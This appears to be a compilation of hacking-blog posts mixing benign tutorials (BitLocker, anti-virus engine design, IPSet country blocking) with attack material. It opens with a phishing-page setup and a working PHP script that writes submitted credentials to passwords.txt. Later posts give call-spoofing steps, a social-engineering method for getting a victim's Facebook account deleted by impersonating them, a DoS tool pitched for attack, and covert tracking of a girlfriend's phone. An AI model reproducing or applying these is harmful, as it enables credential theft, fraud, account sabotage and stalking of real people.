Open The index,html File In Notepad And Press CTRL+F
You Will See A Box
Type Action And Press Enter
It Will show U The Word
there You Will See 2 Options
Up And Down
Select Up
Then Enter
Code For Write.php File
<*?php
header(“Location: http://RANDOM“);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Remove The * Symbol From The Start Of The Code

Call Spoofing

Here is the trick….
just dial -
+239 299328

then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call … everything done, and call will get connected
or else use this format –
+239 299328 p 919895012345 p 919895000000
here it will display the no: 919895012345
and make call to this no: 919895000000
and hope u know “p”
just press star key 3 times “p” will appear
In Iphones … instead of p a comma , is used
NOTE
* To spoof your phone will call an international number , international rates will apply
* Number to call should start with the 91 prefix
* Dialing the spoof no: takes around 20 seconds
* Some one told me that this spoof work for all country’s , i am not sure about that but its working in india
* Even if you try to make miss call you will loose money , since you are dialing an international no:
DISCLAIMER
* Do this at your own risk. I am not responsible for any damage caused
* Just shared with you guys coz sharing is caring.. dont call 100 and say “bomb”

PenTBox v1.4

PenTBox is a Security Suite with programs like Password Crackers, Denial of Service testing tools like DoS and DDoS, Secure Password Generators, Honeypots and much more. Destined to test security and stability of networks.

Tools included in PenTBox

Base64 encoder y decoder,
Digest for MD5,
SHA1,
SHA256 and SHA512,
Port scanner,
TCP DoS,
TCP AutoDoS,
SYN DoS,
Honeypot,
L33t Sp3@k Converter
PenTBox is programmed in Ruby so ruby is required, and oriented to GNU/Linux systems compatible with Windows, MacOS and more.
Tutorial for PenTBox:
1.Download PentBox and un tar
2. We are using windows box , simply run exe and choose from three options.
3. And your ready to attack  or audit. Nothing much to think or relay on.
Download PentBox Here
Pentbox is simple yet powerful .Feature i liked most is simple honeypot

WEAKERTHAN LINUX FOR HACKERS

Most of you would have heard about backtrack but its not the only one in the business.Weakerthan is another linux based pentesting distro which is really good.My second favorite after backi


Intro:

WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.
The tools i have selected are tools we use all the time here, as i said, If you find some that you want in it, please let me know. The image is about 1GB meaning; It will have to be on DVD, meaning; I can’t host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that are preinstalled:
* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..

really good GUI+vulnerable applications to test our hacking skills


my personal experience with weaknet was really good & its worth.


WEAKERTHANv2 WeakNet Linux 5 – ISO ~684MB
WeakNet Linux Complete Administration Guide

How To Delete Someone Else Facebook Account

This is an extreme example of Social Engineering technique, we need following things to do so.
1. Victim’s profile link ( you can get it easily )
2. His/Her Email which he/she uses to sign in
3. His/Her birth date which he/she has used in the profile
4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.
* Now you will get this screen

Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email u created.

* You will get a email on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim’s name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ‘ I am a girl and it poses threat to my social life ‘ and write anything you want that could make them take action.
* After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
* Next Day or Same Day you will get an Email that your account is disabled.

This tutorial is for education purpose only, once deleted profile can never be recovered.

Use Windows 7 BitLocker to Password Protect, Encrypt USB Drive

Do you’ve some important data in your USB drive that you don’t want to share with anybody? It may be some documents, username/passwords or operating systems. Then why not encrypt the USB drive data with password? And if you’re using Windows7, you don’t even need any third party software for password protecting portable drives.
Windows 7 includes a program called BitLocker for encrypting any drive in 2-3 simple steps. Just follow the steps below… and you can secure you files inside USB flash drive but setting a password and encrypting data contents.

How to Use Windows 7 BitLocker to Password Protect USB, Potable Drives

Step 1 : Insert your USB drive, or any portable hard drive and Right click on it in explorer. Now choose “Turn on Bitlocker…“

Step 2 : A small window will appear and prompt you for choosing a password that will be required while opening it later. Proceed by clicking the “Next“.

Step 3 : Bitlocker will create and save a recovery key in your PC in case you forget password. Simply choose the first option to save the recovery key in a text file in a secure place.

Step 4 : Wait for few minutes while it will be encrypting the portable drive slowly.Depends upon the data volume in your removable drive.

Step 5 : Once done, plug-off and insert the USB drive again to see the encryption in action. BitLocker encryption will be automatically run up and prompt you for putting the password. You have to put the password for only once for accessing the data in it until you plug off.

The encryption is absolutely machine independent i.e. whenever you will insert the USB drive to any other computer, it will still prompt for the decryption password.
Very useful for locking USB drives with password and encrypting it to keep it secure.

Hide your IP address

Your IP is exposed when ever you visit a website,when your Ip gets exposed it becomes easy to trace you and find out your personal information,Hackers can use your Ip to gain access to your personal files and documents and even can get into your paypal,alert etc accounts,Hide the Ip is a Software which masks your IP with one click and you can surf web anonymously,on the other hand Hackers can use this software to hide theiridentity and not get caught,its benificial for all and i recommend that every Pc should have this software installed

Hide the IP to be the best one. It’s ease of use, reliability, wide range of options, speed and unmatchable price were on top when compared to that of the remaining IP Hising softwares on the market.

Key Features of Hide the IP:

Hide IP Address »
Single click to completely hide your Online Identity. Others will see a fake IP address masking your real IP, thus, protecting your privacy.
Select Your Physical IP Location »
You decide which country will be indicated as your origin by simply choosing from a country list. We have hundreds, hourly updated, IP addresses available for use.
Anonymous Web Surfing »
You are protected from hackers who will be tricked by your fake IP instead of your real. They will never be able to find any information about you by tracing the fake IP.
Send Anonymous E-mails » Hide your IP in E-mail headers. Be protected while sending emails from Yahoo!, Hotmail, GMail. Upgrading to Platinum Service add-on will protect you in Outlook!
Bypass Website Country Restrictions »
Surf websites which are restricted for your country. Surf in forums on which you were banned.

Supports Internet Explorer, Firefox, Google Chrome, Safari, Opera.

So what are you waiting for? Download the free trial and test Hide the IP on your computer now! For more information on Hide the IP visit the following link.

Hide the IP

Building an Anti-Virus engine

An article that describes in simple steps how an AV engine is structured. Easy to understand, not too technical and without any code.
Building an Anti-Virus engine

The article will describe the basic ideas, concepts, components and approaches involved in developing an anti-virus program from scratch from a developer’s/software engineer’s point of view. It will focus on the main elements of an anti-virus engine (hereafter referred to as AV engine) and will exclude aspects like graphical user interfaces, real-time monitors, file system drivers and plug-ins for certain application software like Microsoft Exchange or Microsoft Office. Although AV engines running/scanning for single platforms (such as Palm OS or EPOC/Symbian OS) can be designed in the same way, this article will focus on designing multi-platform scanning engines, which are far more complex.

Overview

Currently, innovations in AV engines consist primarily of minor changes to existing engines. Complete redesigns of overall engine concepts are rarely seen. One exception is the highly respected Kaspersky AntiVirus (AVP) version 4.0, which was released in early 2002.
The main parts of an AV engine are typically compiled based on the same source code for various platforms, which may have differences in the byte order (little/big endian), CPUs and general requirements on aligned code. All of these considerations must be kept in mind when developing the concept of an AV engine, as the platform on which the engine is designed to run will be a central design consideration. As well, when developing a new AV engine from the ground up, the following consideration or requirements must be considered:

• Targeted platforms
• Programming language
• File access
• Required modularity.

Targeted Platforms

A lot of platforms execute code faster when the data parts are aligned to long word (32 bit) addresses. Other platforms are not able to access 16bit/32 bit values, which are not on even addresses; for example, older Motorola CPUs like MC68020 had this limitation. The choice of programming language depends directly on the platform or platforms of implementation. Generally an AV engine should be developed in a programming language that is available for all platforms. Optimizing compilers for all platforms are available. Typical AV engines are currently developed using the programming languages C or C++. C++ is considered the more modern language but, being based on the object orientated approach, it is typically bigger and slightly slower than C code. As certain data types will be interpreted differently on different platforms (for example, as determined by. long or integer variables), it is also very helpful to define data types based on standard data types, which are the same on all supported platforms.

File Access
To enable the core AV engine to be independent from the surrounding operating system, there must to be an abstraction layer between the core AV engine and the file system, which layer has to include conditional compilation for dedicated platforms. Another straightforward technique is to compile certain parts of the AV engine only for dedicated operating systems and not to use a file system layer at all. While this way approach results in faster programmed results, for the long term, it turns out to be neither easily maintainable nor expandable. An abstraction layer, comparable to the file system abstraction layer, should be also implemented for the memory interface and the graphical user interface, so that the core scan engine always has to call the same API calls to allocate memory, generate message boxes etc.

Modularity

Modularity is an important consideration in modern software development. Obviously, it is advantageous to create clean interfaces and make all program parts modular. By designing the overall AV engine with modularity in mind, single parts can be replaced later against a more powerful module by keeping the functionality the same. (This aspect will be covered in the discussion of on-line update functionalities later in this paper.) For corporate customers, it is especially important to offer a flexible management console/interface. This part obviously does not belong to the AV engine core, but should be kept in mind when designing overall interfaces, engine modules and communication matrixes. Speaking of modularity, it is also a good idea to divide the parts of the core AV engine into components, whereby the separation in a binary virus engine and a macro/script engine can be seen as a high level approach.

Pragmatic Functions

Now that some of the conceptual aspects of the AV engine design have been discussed, it would be helpful to consider some of the pragmatic functions that must be incorporated into the design of an AV engine. The following components or functions must all be taken into account in the development of a “modern” AV engine:

• Engine core
• File system layer
• File type scanners (rtf, ppt, mz, pe, etc.)
• Memory scanners
• File Decompression (e.g. ZIP archives, UPX compressed executables)
• Code emulators (e.g. Win32)
• Heuristic engines
• Update mechanisms.

AV Engine Core

The AV engine core can be seen as a straightforward framework that calls “external” scan modules and therefore can be expected to be the necessary “glue”. As a result, it needs to be designed as a “registration” mechanism, so that additional components, such as a scanner for a new file format, can be registered and updated. This mechanism needs to be protected by digital certificates or similar mechanisms. Currently, there are scan engine frameworks, such as the Exchange virus protection, that offer to use between one and five different scan engines from different vendors, which will be directly called out of the framework. For example, besides their own scan technologies, F-Secure utilizes several solutions in their AV products, including F-Prot and AVP scan engines.

File System Layer

As mentioned in the previous section, it is a good idea to implement a file system layer so that all parts of the AV engine can invoke the same API calls on all platforms. The following functionalities (close to the Ansi-C standard) should be supported to enable easy access to files:

• open(filename)
• close(filehandle)
• read(file handler, buffer, length, number of read bytes)
• write(file handler, buffer, length, number of written bytes)
• seek(offset, optional fields)
• find first(handle)
• find next(handle)

In case a seek() functionality is not intended to be supported as an API call, the read/write functionality needs to be enhanced by adding a “file offset” field. The general “find first/find next” file functionality will typically only be used within the core AV engine, as this core part then passes the file pointer-like structure to the “external” scan modules for further operations.

File Type Scan

In regards to the program progression, one of the first steps is to identify the file type/archive type. For the time being, let’s call this point within the engine the “entry point”. This can be handled from the core AV engine or from a dedicated function call within every scanner module for a dedicated file format/type. In order to enable easy change/adaptation of a new scanner module, the latter method is preferred.
Typically, this file type check can be performed rather quickly (e.g. for Windows PE files, OLE documents etc.). In dedicated cases like PalmOS PRC files the detection is more complex and, again, should not be placed within the core AV engine. If a compressed file is detected, decompression engine/functionality, which shall be discussed in greater detail later in this article, has to be called. More generally speaking, decompression engines can also be seen as some kind of a scanner module, which necessarily has to call back to the AV engine’s entry point.
After the file type has been determined, the corresponding scanner module has to be called to perform the scan routine itself. Every module should have the ability to call back to the entry point of the AV engine. This may be required in the case of scanning embedded files within other files (for example, a Word document embedded within a PowerPoint presentation). Depending on the result of the scan, the AV engine must be able to interact with the user interface via a generic abstraction layer to show certain warnings, requests, etc.
At this point it makes sense to define what functionalities should exist within every scanner module:

• file type detection code, which checks whether the given input can be handled by the scan module;
• scan functionality (which should be able to interact with the GUI elements to show requesters etc.); and,
• removal functionality (e.g. remove link viruses from infected files or delete files completely).

The idea is to keep the interface as small and clean as possible. The scan modules should not rely on any buffers located in the core AV engine. Furthermore, the core scan module should just see file/memory pointers and work with these pointers. All underlying operations/layers should be fully transparent for the scan module.

Removal Functionality
In the case of removal functionality, it is often necessary to remove registry entries in order to disable the activation of certain malicious code. This functionality, which is obviously heavily dependent on the underlying platform, should be programmed using direct operating system functions, and should be compiled only when needed. At this point it makes no sense to implement an abstraction layer.

Memory Scanning Components

The memory scanning components (e.g. memory scanner for Windows 95/98 IFS-based malicious codes) can be placed within the same category as the registry cleaning functionalities described above. It should be noted that the memory scanning components are often not within the main focus of the development of the AV engine.

Decompression

The decompression functionality within AV engines is often seen as a small task, but it is truly a complex program. On the one hand, archives, like .zip, .tar, etc., and exchange formats, such as mime, uuencode etc., are decompressed recursively and without the need for external decompression programs. On the other hand, executable files should be able to be decompressed. Speaking of decompression of archives/exchange formats, it seems to be a good approach to decompress all files within a predefined directory and perform recursive decompression operations, if necessary. In the past we have seen a couple of attacks (see [42]) against decompression modules, that decompressed the embedded files within memory and the system was running out of memory. The file located at [42] is a .zip archive with a total length of 42 kb. Recursively unpacked, the files archived within this file are far more than 100 MB, so that an “in memory” decompression would obviously decrease performance drastically.
Additionally it should be possible to compress the files into archives again to enable meaningful cleaning operations. The decompression operation, therefore, also needs access to the generic file system layer to store/access decompressed files.
Speaking of compressed executable files (e.g. compressed with UPX), a similar approach is possible. The decompressed file can be saved in a predefined directory and then scanned. Another typical approach is to decompress the entire file into memory and pass back the pointer and length of the file to the calling instance. The file system layer would have then to be able to address a memory range also as a file.
Finally, it should be noted that encrypted files/archives are still a major problem for decompression engines and therefore also for AV engines. Nearly all archive tools offer the possibility to encrypt the content.

Detection Engines and Techniques

Right now it is worth taking a look at detection engines and techniques beside heuristic engines.
Nearly every modern AV engine contains checksum-based engines (often straight forward CRC32) and scan string-based engines. In addition to these basic techniques, script-based interpreters can often also be found in engines. By implementing these interpreters with complex instruction sets, it is possible to write detection/removal routines even for highly complex polymorphic viruses, and often without the need to change the engine/program detection code in C/C++. Obviously, these interpreters need access to emulators, memory layers and file system layers to become as powerful as possible. The interpreters typically work with precompiled code (pcode) located in the data/definition files.

Designing the On-Line Update

The core points of AV engine architecture have now been discussed. Another point to consider is the design of the “on-line update” functionality that allows users to update their AV protection. Basically there are two choices of update functionality: update data files or update data files and update executable code.
Generally speaking, all updates should be digitally signed to protect the users from installing malicious updates. It is not critical to implement this in the data file updates. Sending out only updated from previously installed versions, instead of complete update files, will keep network traffic low and, as such, is an attractive feature for users in corporate environments. To update executable code using on-line functionality is usually a more complex operation. This approach typically replaces complete modules of an AV scanner. Therefore the AV engine needs to have the functionality to register, remove, update and add modules of its own. This interface obviously needs to be protected (for example, by digital certificates), otherwise malicious codes could start to attack this registration interface and disable certain important functionality.

Conclusion

At this point it is clear that the development of a complete AV engine for a platform like Windows is an extremely complex task, one that needs to be undertaken by a group of developers. To keep an AV engine stable and maintainable over a long time is a difficult job that requires a lot of investment of money and experience in software engineering. Therefore it is not likely that the selection of independent AV solutions will increase significantly within the next years. This is unfortunate because the technical requirements on AV engines continue to grow and a greater variety of possible solutions can only help AV developers and AV users.

Blocking IPs by country using IPSet and IPTables

Introduction

What would you do when you want to allow access only to specific countries to access content on your server? Actually there are many ways to do it, like by installing application, using mod_geoip with Apache, etc.
But all that isn’t global, i.e. if you use Apache to block ips, other ports will be still open to the blocked countries. It might be global in an exceptional case if you installed an application that sits listening to all connections something like a firewall.
But what’s the guarantee that it will not be a bloat or extra load on the system? There’s no guarantee about it.
So here we have something nice, different, trustable, easy to use and lightweight, IPSets in combination with IPTables.

What is IPSet?

IPSet basically allows you to store multiple IP addresses and/or ports in a table and match across all of them at once. The table seeks are much faster than using individual IPTables rules.
IPSet framework is included in 2.4.x and 2.6.x kernels by default, but the utility with which it has to be managed has to be installed separately. I have a no clear idea if an distributions have packages for IPSet.

Some features of IPSets

1. Store multiple IP addresses or ports in a table and match against it using iptables at once without much performance overhead.
2. Dynamically update the IP addresses or ports in the table, without changing the rules in iptables, again low performance penalty.
3. Express multiple IP addresses and ports in one single iptables rule, that is, with one single rule, you can match against a million IPs (just an example, there can be even more).

Installing IPSet

You will need the source code for the current kernel you are running. It is usually available as a kernel-headers package. Varies from distribution to distribution. In most cases the kernel source code is found under /usr/src/linux-<version> which is easier to access as /usr/src/linux-$(uname -r) at the shell, because you don’t have to type the version. At the time of writing this, there are two versions available for ipset at http://ipset.netfilter.org/install.html.
We will be using ipset 4.5 which is for kernels >= 2.6.16 and >= 2.4.36.
First extract the ipset-4.5.tar.gz and change directory to ipset-4.5:

> tar -xf ipset-4.5.tar.gz
> cd ipset-4.5

Assuming you have the kernel source code available at /usr/src/linux-$(uname -r), issue the following command to compile ipset:

> make KERNEL_DIR=/usr/src/$(uname -r) IP_NF_SET_MAX=256 IP_NF_SET_HASHSIZE=1024

IP_NF_SET_MAX controls the maximum number of IPsets permissible and IP_NF_SET_HASHSIZE sets the default size for hash maps. The default values are used in the above command for illustration, the same values are taken by make even if you don’t specify them.
Now to install just run sudo make install or su -c ‘make install’ if you are running as a user or simply make install if you are running as root:

> sudo make install / su -c 'make install' / make install

If you don’t get any errors, installation is complete .

Using IPSet to block IPs by country

As the title says, our objective is to block IPs belonging to certain countries. In this article I’ll consider China (cn) and Russia (ru) to be blocked.

Creating IPsets and Adding IPs to Them

Now that ipset has been installed, let us create the set named `countries’. Please note that all the following commands are to be executed as root, you may use sudo or su -c as applicable.

# ipset -N countries nethash

This creates a new ipset named `country’ of type `nethash’. There are different types of ipsets viz. ipmap, macipmap, portmap, iphash, nethash, ipporthash, ipportiphash, ipportnethash, iptree, iptreemap, setlist.
Each set has its own purpose and the use of each set can be found in ipset main page, also available at http://ipset.netfilter.org/ipset.man.html.
Here we are using `nethash’ set type because the IP database at ipdeny.com which we will be using to block IPs provides IPs in IP-Address/CIDR-length form which is supported only by `nethash’.
Now that we have created the set named `countries’, we can start adding IP Address to the set. As I said earlier, in this article, blocking China and Russia are taken as an example. No offense meant please.
The IPs existing in China and Russia are found at http://www.ipdeny.com/ipblocks/data/countries/cn.zone and http://www.ipdeny.com/ipblocks/data/countries/ru.zone respectively. To add all the IPs from these two zones, we’ll be using a simple bash-for loop coupled along with wget to retrieve to the zone files.

# for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/{cn,ru}.zone)
> do
> ipset -A countries $IP
> done

This will add all the IPs in the CN and RU zones to the IPset. If you are adding more zones to your block list, please note that the nethash set can store up to 65535 addresses. If you exceed the limit, you must add the remaining in another set, and so on. The total number of IPs in China and Russia zones combined

Matching against the IPSet(s) in IPTables

The IPs which we want to block, have been added to the sets. So now let us add rules in IPTables and block those IPs!
We will be applying the filter on INPUT chain, to block all connections from CN and RU.
So here’s how you do it-

# iptables -A INPUT -m set --match-set countries src -j DROP

Now connections from all IPs that exist in the set `countries’ that is CN & RU as we created the set above will be blocked, unless you have any other rule before this rule to permit connections.
In case you exceeded the 65535 address limit and you have multiple sets to match with, for example you named the first set `countries’, the second one `countries1′ and so on, you can add multiple -m set –match-set options to iptables as illustrated below:

# iptables -A INPUT -m set --match-set countries -m set --match-set countries1 -m set --match-set countries2 -j DROP

So, enjoy, secure your server better….

How To Trace and Spy Your Girlfriends Mobile Phone Live for Free

Yes Guys, this is now possible, I’m not joking. Many of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes, PhoneOnMap makes it possible. It’s a service that provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfriend/wife too, LOL. This PhoneOnMap can be used worldwide and you can use it while traveling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketing department of an organization to track the marketing agents.

If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installing application on cell phone.
Features of GPS cell phone tracking system:

1. GPS cell phone tracker and locater will not work in the underground transportation.
2. The application does not work when the phone is turned off.
3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us.
4. Once application is uninstalled from cell phone than you can’t do anything.
5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes, which is depend on setting.

According to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delivery system like Currier and Home delivery system. This will help them to get a real-time location of the object and provide an accurate time-frame for the delivery.
As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfriend
www.phoneonmap.com

How to make a completely hidden folder

Here, I am going to illustrate a method to completely hide a folder which you dont want to be displayed – not by using attributes, but a tricky method. It can be done without changing any attribute, without using any software, without adding/removing any files. Its a simple trick which can be done with normal windows and no extra installations and no hi fi tricks.

Locate to the folder which you dont want to be displayed. 
Next, rename the folder with Alt+[0160], I mean, press Alt key and without releasing, press 0160. Then you can notice that the name of the folder is gone and a simple space appears as the name of the folder, which cannot be displayed.

Proceed by changing the icon of the folder. This can be done with this procedure. Right click on the folder Properties> Customize> Change Icon. Here you can find few invisible icons, just use them to create your invisible folder.

That’s it! your invisible folder is ready….

Here I have selected the folder, so you can identify that something exists there. If it is not selected, nothing can be found….Totally invisible folder is made.
If you like this post, you may subscribe to feed, post comments, add to technorati favorites, digg this, stumble this, share this.
Please respond with your comments.

Create New Facebook Profile Layout Hack Using Tagged Photos Easily

//
//
// Few days back Facebook released the new facebook profile layout which is completely different from the old one. One feature was very much new was Photostream which showed your recently tagged photos under your profile name below the new bio.
Someone discovered to use tagged photos in photostream creatively to design the new facebook layout hack. Some stunning examples are shown below.

Want your Facebook Profile to look like This ?

The above image is a demonstration of the effect that can be achieved with tools below which will allow you to easily turn any image into what you see!

How to Use New Facebook Layout Profile Image Trick

# PicCut: Facebook New Profile Image Trick Picture Generator

PicCut (Link) is an useful  online tool that allows you to upload large picture and it will automatically slice up the image according to the size requirements of the facebook new profile photo image trick.

An useful addition to this tool is it lets you select the no. of lines in your profile bio. If your profile bio is 1-2 lined then the alignment of the photostream thumbnails is non proper making it look mis-aligned.

# PicScatter: Create Facebook New Profile Image Trick

PicScatter (Link) is a similar tool like PicCut you can use with the new Facebook profile to make amazing profile pictures, with an added advantage to directly upload the image and thumbnails to your facebook profile. This makes it easily to implement the facebook new profile photo hack to your profile.

As soon as you’ve uploaded your image, you can zoom in and out, drag it around and tell it how many lines of bio (info-text) you have. This last option can help you see if it’d be better to add or remove a bio line to optimize the photo hack effect. When you’re finished, you can download the individual image files in a compressed archive (pic_scatter.zip) or publish them instantly to Facebook. (detailed guide on ampercent)

Using these Generated Profile Photo and Thumbnail Images

Step 1: Upload your desired picture and let PicCut or PicScatter to generate the correctly sliced up profile image and 5 thumbnails.
Step 2: Download the generated ZIP file of your images, or manually save them.
Step 3: First, set the image named “profile-pic.jpg” as your Facebook profile picture.
Step 4: Create a new photo album, then upload the other images in the order of their filenames.
Step 5: Tag yourself in all 5 photos, starting with “image5.jpg” and ending with “image1.jpg.”
Step 6: Hide any tagged photos you do not wish to display on your profile. That’s it!